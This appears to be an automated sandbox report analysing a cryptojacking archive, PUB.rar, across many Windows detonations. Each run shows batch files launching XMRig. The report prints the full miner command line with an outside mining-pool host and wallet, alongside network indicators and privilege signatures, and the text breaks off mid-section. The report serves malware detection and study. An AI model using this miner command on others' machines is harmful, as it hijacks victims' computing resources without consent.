Malware Analysis Report

2025-08-10 14:49

Sample ID 241026-b6pkhsvpan
Target PUB.rar
SHA256 5b06e18380c2c8261419a482e5d54b189bbe9b0feaccd355c3cb1bc4aaedd017
Tags
miner xmrig
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b06e18380c2c8261419a482e5d54b189bbe9b0feaccd355c3cb1bc4aaedd017

Threat Level: Known bad

The file PUB.rar was found to be: Known bad.

Malicious Activity Summary

miner xmrig

XMRig Miner payload

Xmrig family

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-10-26 01:45

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

300s

Max time network

304s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 220 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 220 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
FR 20.74.47.205:443 fd.api.iris.microsoft.com tcp

Files

memory/2700-0-0x0000020D0C470000-0x0000020D0C490000-memory.dmp

memory/2700-1-0x0000020D9E610000-0x0000020D9E630000-memory.dmp

memory/2700-2-0x0000020D9EA50000-0x0000020D9EA70000-memory.dmp

memory/2700-3-0x0000020D9EC80000-0x0000020D9ECA0000-memory.dmp

memory/2700-5-0x0000020D9EC80000-0x0000020D9ECA0000-memory.dmp

memory/2700-4-0x0000020D9EA50000-0x0000020D9EA70000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

300s

Max time network

284s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1028 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 1028 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

memory/3592-0-0x000002075F3D0000-0x000002075F3F0000-memory.dmp

memory/3592-1-0x000002075F420000-0x000002075F440000-memory.dmp

memory/3592-3-0x000002075F440000-0x000002075F460000-memory.dmp

memory/3592-2-0x000002075F460000-0x000002075F480000-memory.dmp

memory/3592-5-0x000002075F440000-0x000002075F460000-memory.dmp

memory/3592-4-0x000002075F460000-0x000002075F480000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

155s

Max time network

282s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3276 wrote to memory of 1344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3276 wrote to memory of 1344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 197.240.204.15.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
IE 20.223.36.55:443 fd.api.iris.microsoft.com tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

memory/1344-0-0x00000168B3EB0000-0x00000168B3ED0000-memory.dmp

memory/1344-1-0x00000168B4010000-0x00000168B4030000-memory.dmp

memory/1344-3-0x00000168B4030000-0x00000168B4050000-memory.dmp

memory/1344-2-0x00000169466D0000-0x00000169466F0000-memory.dmp

memory/1344-5-0x00000168B4030000-0x00000168B4050000-memory.dmp

memory/1344-4-0x00000169466D0000-0x00000169466F0000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241023-en

Max time kernel

91s

Max time network

311s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2232 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2232 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/1520-0-0x000001C52AD20000-0x000001C52AD40000-memory.dmp

memory/1520-1-0x000001C52AD70000-0x000001C52AD90000-memory.dmp

memory/1520-2-0x000001C52AD90000-0x000001C52ADB0000-memory.dmp

memory/1520-3-0x000001C52ADB0000-0x000001C52ADD0000-memory.dmp

memory/1520-4-0x000001C52AD90000-0x000001C52ADB0000-memory.dmp

memory/1520-5-0x000001C52ADB0000-0x000001C52ADD0000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

147s

Max time network

280s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1280 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 1280 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/2912-0-0x00000280DEB50000-0x00000280DEB70000-memory.dmp

memory/2912-1-0x00000280DEBB0000-0x00000280DEBD0000-memory.dmp

memory/2912-3-0x00000280DEBF0000-0x00000280DEC10000-memory.dmp

memory/2912-2-0x00000280DEBD0000-0x00000280DEBF0000-memory.dmp

memory/2912-4-0x00000280DEBD0000-0x00000280DEBF0000-memory.dmp

memory/2912-5-0x00000280DEBF0000-0x00000280DEC10000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

300s

Max time network

280s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 668 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2296 wrote to memory of 668 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 197.240.204.15.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/668-0-0x000001F5473F0000-0x000001F547410000-memory.dmp

memory/668-1-0x000001F548D60000-0x000001F548D80000-memory.dmp

memory/668-2-0x000001F548DA0000-0x000001F548DC0000-memory.dmp

memory/668-3-0x000001F548D80000-0x000001F548DA0000-memory.dmp

memory/668-5-0x000001F548D80000-0x000001F548DA0000-memory.dmp

memory/668-4-0x000001F548DA0000-0x000001F548DC0000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

147s

Max time network

282s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3552 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3552 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp

Files

memory/388-0-0x000001EF1EE90000-0x000001EF1EEB0000-memory.dmp

memory/388-1-0x000001EF1EEE0000-0x000001EF1EF00000-memory.dmp

memory/388-3-0x000001EF1EF20000-0x000001EF1EF40000-memory.dmp

memory/388-2-0x000001EF1EF00000-0x000001EF1EF20000-memory.dmp

memory/388-4-0x000001EF1EF00000-0x000001EF1EF20000-memory.dmp

memory/388-5-0x000001EF1EF20000-0x000001EF1EF40000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

91s

Max time network

269s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2516 wrote to memory of 4116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2516 wrote to memory of 4116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp

Files

memory/4116-0-0x000002099DF30000-0x000002099DF50000-memory.dmp

memory/4116-1-0x000002099DF80000-0x000002099DFA0000-memory.dmp

memory/4116-3-0x000002099DFA0000-0x000002099DFC0000-memory.dmp

memory/4116-2-0x000002099DFC0000-0x000002099DFE0000-memory.dmp

memory/4116-5-0x000002099DFA0000-0x000002099DFC0000-memory.dmp

memory/4116-4-0x000002099DFC0000-0x000002099DFE0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

154s

Max time network

280s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

Network

Country Destination Domain Proto
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
IE 20.223.35.26:443 fd.api.iris.microsoft.com tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/1144-0-0x0000000000010000-0x0000000000017000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

300s

Max time network

203s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
N/A 13.89.179.10:443 tcp

Files

memory/1056-0-0x0000026771D80000-0x0000026771DA0000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

212s

Max time network

283s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4100 wrote to memory of 3168 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 4100 wrote to memory of 3168 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp

Files

memory/3168-0-0x00000209C94F0000-0x00000209C9510000-memory.dmp

memory/3168-1-0x00000209CAFB0000-0x00000209CAFD0000-memory.dmp

memory/3168-3-0x00000209CB010000-0x00000209CB030000-memory.dmp

memory/3168-2-0x00000209CAFF0000-0x00000209CB010000-memory.dmp

memory/3168-5-0x00000209CB010000-0x00000209CB030000-memory.dmp

memory/3168-4-0x00000209CAFF0000-0x00000209CB010000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

299s

Max time network

303s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3548 wrote to memory of 3684 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3548 wrote to memory of 3684 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp

Files

memory/3684-0-0x00000234ADC50000-0x00000234ADC70000-memory.dmp

memory/3684-1-0x00000234AF540000-0x00000234AF560000-memory.dmp

memory/3684-2-0x00000234AF560000-0x00000234AF580000-memory.dmp

memory/3684-3-0x00000234AF580000-0x00000234AF5A0000-memory.dmp

memory/3684-4-0x00000234AF560000-0x00000234AF580000-memory.dmp

memory/3684-5-0x00000234AF580000-0x00000234AF5A0000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

299s

Max time network

302s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

